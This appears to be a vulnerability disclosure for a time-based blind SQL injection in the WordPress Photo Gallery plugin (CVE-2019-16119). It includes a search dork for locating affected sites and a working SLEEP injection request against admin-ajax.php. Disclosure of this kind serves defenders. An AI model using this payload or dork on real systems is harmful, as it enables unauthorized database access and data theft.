# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection# inurl:"\wp-content\plugins\photo-gallery"# Date: 09-10-2019# Exploit Author: MTK (http://mtk911.cf/)# Vendor Homepage: https://10web.io/# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip# Version: Up to v1.5.34# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap# CVE : 2019-16119# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.# Technical Details & Impact:
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from
them.# POC
In Gallery Group tab > Add new andin add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection.Following is the POC,1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&2.http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&# Timeline09-01-2019- Vulnerability Reported
09-03-2019- Vendor responded
09-04-2019- New version released (1.5.35)09-10-2019- Full Disclosure
# References:
Photo Gallery by 10Web – Mobile-Friendly Image Gallery
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119